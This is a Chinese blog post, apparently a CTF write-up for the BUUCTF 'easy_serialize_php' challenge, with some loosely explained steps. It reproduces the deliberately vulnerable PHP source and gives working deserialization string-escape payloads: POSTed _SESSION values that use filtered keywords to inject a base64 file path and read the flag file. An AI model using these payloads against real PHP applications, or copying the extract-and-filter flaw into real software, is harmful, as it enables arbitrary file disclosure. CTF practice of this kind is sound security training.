BUUCTF--[安洵杯 2019]easy_serialize_php

最新推荐文章于 2024-05-06 11:04:22 发布
最新推荐文章于 2024-05-06 11:04:22 发布
阅读量154 收藏
点赞数
分类专栏: web安全 文章标签: php 开发语言 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65766842/article/details/129823612
版权

我们首先打开题目

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

遇到web的题目,我们首先习惯性的去找到if语句,进行我们的代码审计。

我们将if语句的部分交给gpt

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

从代码审视来看,这一段web可以用代码的注入来做,

然后我们通过查询知道这一段的知识点是php反序列化的逃逸。

参考资料:

https://blog.csdn.net/solitudi/article/details/113588692?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168000662316782425187302%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168000662316782425187302&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-113588692-null-null.142^v76^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96&spm=1018.2226.3001.4187

这一段需要用到phpinfo()函数,参考资料:

https://blog.csdn.net/qq_51478862/article/details/119517944?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168000312816800180622250%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168000312816800180622250&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-119517944-null-null.142^v76^insert_down1,201^v4^add_ask,239^v2^insert_chatgpt&utm_term=phpinfo&spm=1018.2226.3001.4187

上面提示如果传入phpinfo的话就会eval执行phpinfo,我们构造语句进行上传

?f=phpinfo

 我们在目录文件下找到了像flag的文件(d0g3_f1ag.php)

我们想要打开这个文件的时候,url处显示的是空白返回,可能被过滤掉了。

 我们在回看它一开始的源代码

 所以我们应该构造出这段代码

/index.php?f=show_image

得出一下反馈

 我们在回看代码审计

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

询问chatgpt

 了解完了全部的代码以及分布内容,我们开始将原本的数据序列化,我们通过反序列化函数将 ’O:4:"user":2:{s:4:"name";s:3:"111";s:3:"age";i:29;}‘ 这个字符串反序列化。运行下面的代码,正常情况下我们会得到111的输出.

<?php
$str = 'O:4:"user":2:{s:4:"name";s:3:"111";s:3:"age";i:29;}';
$u = unserialize($str);
echo $u->name;
// aaa
?>

但是运行的结果没有什么影响,了解之后知道反序列化的过程有一定的识别的范围,在范围之后的内容会被忽略,但是同时它并不会影响到反序列化的正常运行,并且花括号内的内容不会影响代码的正常的运行。

我们重新构造payload

<?php
$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);
// a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
?>

这里我们运行了之后会发现,我们花括号里的请求会变成空的返回值,我们查看代码,发现是过滤代码将我们的flag给替换为空了,我们重新构造一个反序列,并重新构造一个payload,进行post上传

SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

这时候,我们又得到了新的提示。

我们再次构造payload

_SESSION[fl1gfl1g]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

 这时我们得到了最后的flag

 

m0_65766842
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 very_easy_sql 解题详析(gopher协议+ssrf漏洞sql注入+盲注脚本)
等风来
08-01 8133
登录处直接注入会提示you are not an inner user, so we can not let you have identify~查看源代码发现use.php,访问后猜测该题为基于ssrf漏洞的sql注入:因此我们可构造含有gopher协议的盲注脚本,通过对use.php界面发送请求来获取flag。具体实现的方法是通过构造不同的poc来进行注入攻击,并利用时间延迟判断是否成功注入。
第二届安洵2019部分writeup
Sea_Sand息禅
12-01 6046
Misc 吹着⻉斯扫⼆维码 这个就有点过分了,36张碎片,手动拼二维码 先是爆破出了压缩包的密码,解出来flag.txt里面有点乱码,显然还需要操作,可能就跟二维码有关了,二维码扫出来的结果是: BASE Family Bucket ??? 85->64->85->13->16->32 下面就需要把flag.txt中的内容进行base的这一系列的解码了,但是这个1...
[安洵 2019]JustBase(替换表)
最新发布
2302_80322812的博客
05-06 243
我们看到题目是一些杂乱的字母和符号,但从题目和末尾的两个==号,我们猜测是base64加密,但题目未出现1-9数字,而base64不包含!@#$%等字符,所以我们考虑将字符!@#$%按照键盘替换成数字1-9.也可以采用文本文档里面的“替换”,自己手动依次替换。
base64------ “ )!@#$%^&*( ”代换 “0-9”
l2ohvef的博客
02-14 931
观察,可能是base64编码,但是上文有!@#$%^&*()这些符号,直接将这些符号换成键盘上对应的数字0-9。
NSSCTF刷题wp——常用编码
YougerXen的博客
04-10 4317
NSSCTF Crypto 探索 常用编码 前两个题ID303,287在入门时做过了,详见另一篇wp链接 [AFCTF 2018]BASE ID:463 打开文件直接麻了,如果人工解码,估计黄花菜都要凉了,这就需要用到拥有强大数据处理能力的python了,下面是我借鉴得几个大佬的脚本。 首先是大佬xenny的,NSSCTF这个题的wp也有 import re, base64 s = open('/Users/x3nny/Downloads/flag_encode.txt', 'rb').read() bas
BUUCTF-[羊城]Easyser
m0_52358157的博客
06-11 989
BUU:[羊城 2020]EasySer –菜鸟的第一篇ctf题解 一开始拿到题目一面懵,于是常规的查看robots.txt,很幸运提示要你去访问/star1.php 进入到这个界面接着遇事不决f12得到提示使用一个不安全协议获取ser.php 然后开始了漫长的各种尝试:各种php伪协议,各种百度去搜寻不安全的协议,并没有什么结果。后来想到有一位师傅讲过http相对比于https是不安全的,因为它无状态,无连接,具有简单快速、灵活的特性,通信时候使用明文,也不会对通信方进行确认(重点在这!) 所以可以利
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
json.zip_JSON_json c#_json-c
09-19
string jsonString = JsonSerializer.Serialize(person); ``` 反序列化则是将JSON字符串转换回对象: ```csharp Person deserializedPerson = JsonSerializer.Deserialize(jsonString); ``` 在C#中,如果你选择...
php_igbinary-2.0.8-1.0-nts-vc14-x86.zip
11-23
igbinary是一个优化的序列化库,它替代了PHP默认的序列化机制(serialize/unserialize)。传统PHP序列化会将数据转换为文本格式,这在内存和网络传输上都相对较慢。igbinary则将数据编码为二进制形式,大大减少了...
php_igbinary-1.1.1到2.0.8版本大全
12-29
PHP_igbinary是一款高效的数据序列化扩展,专为PHP设计,用于替代默认的PHP序列化方式(如serialize和unserialize)。它的主要目的是提高在数据库存储、缓存系统以及跨进程通信中的性能,尤其是在大型和高负载的Web...
BUUCTF-[安洵 2019]crackMe1
weixin_61154173的博客
02-20 1081
sm4加密所以就是当messageboxA后发生异常,触发了 AddVectoredExceptionHandler()函数异常处理,调用了Handler。如果参数为零,则处理程序是要调用的最后一个处理程序。所以整体逻辑:str1即用户输入经过sm4加密,base64表的大小写互换与移位后的base加密结果与str2两两互换相等。调用此函数后,如果在未调试的进程中发生异常,并且异常会将其设置为未处理的异常筛选器,该筛选器将调用。指定显示按钮的数目及形式,使用的图标样式,缺省按钮是什么以及消息框的强制回应等。
[BT]BUUCTF刷题第6天(3.24)
Bluetuan的博客
03-24 1136
打开网站是一个小游戏,根据题目提示得知需要找到网站的备份文件,这里使用dirsearch进行扫描(由于使用dirsearch自带的字典完整扫描一遍耗时过长,因此根据网上的题解我自己写了一个包含正确备份文件的字典,缩短扫描时间)返回状态码200,说明确实存在该文件,访问下载和打开class.php文件需要反序列化后的对象满足username === 'admin’且password = 100生成代码:user因为username和password。
BUUCTF [安洵 2019]easy_serialize_php
m0_62107966的博客
09-24 556
BUUCTF [安洵 2019]easy_serialize_phpphp反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。 所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效
php反序列化-BUUCTF刷题记录
cike_y
11-30 843
在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真。我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量。序列化payload:O:3:“BUU”:2:{s:7:“correct”;
BUUCTF】[安洵 2019]吹着贝斯扫二维码
Arc_0ne的博客
08-28 3915
题目链接:[安洵 2019]吹着贝斯扫二维码。 下载压缩包解压得到这么一些文件,可以看到一堆未知类型文件和一个flag.zip 老规矩,把这些没有拓展名的文件用010Editor打开,发现都是jpg类型文件。 需要给这些文件添加拓展名,直接使用cmd下的ren命令批量重命名,对添加.jpg拓展名。当然,这里可以用Python写脚本,但个人认为这里用cmd命令更方便快捷。 命令:ren * *.jpg //这条命令会把此目录下所有文件重命名,所以使用的时候注意目录位置 //还有注意这里的flag.z.
[安洵 2019]easy_web
paidx0
08-21 146
呜呜呜,web狗没法活啊 随便看看,发现有东西被隐藏了 在抓包看看还有什么隐藏的东西 果然是有东西的,base64解码看看,结果是个图片,也就是那个表情包 猜测这里应该是利用了对象包含,所以尝试把源码拉出来看看 果然没错,表情包就是被下载的,所以这个就是源码base64解码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd.
安洵 2019easy-web
bwxzdjn的博客
07-19 850
涉及内容:base64解码、代码审计、MD5强类型注入、命令注入绕过 打开控制器,查看源代码,可以看到md5 is funny,可知这题应该会出现MD5 其余信息一无所获后,看到网站: 看到img=TXpVek5UTTFNbVUzTURabE5qYz0,想到base64解码 于是去Burp Suite解码 (其余大佬解出为555.png,类似一种图片形式) 得知文件名被hex->base64->base64 三重编码 于是反加密读取index.php,得到index.php base64形
[安洵 2019]easy_serialize_php 1
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值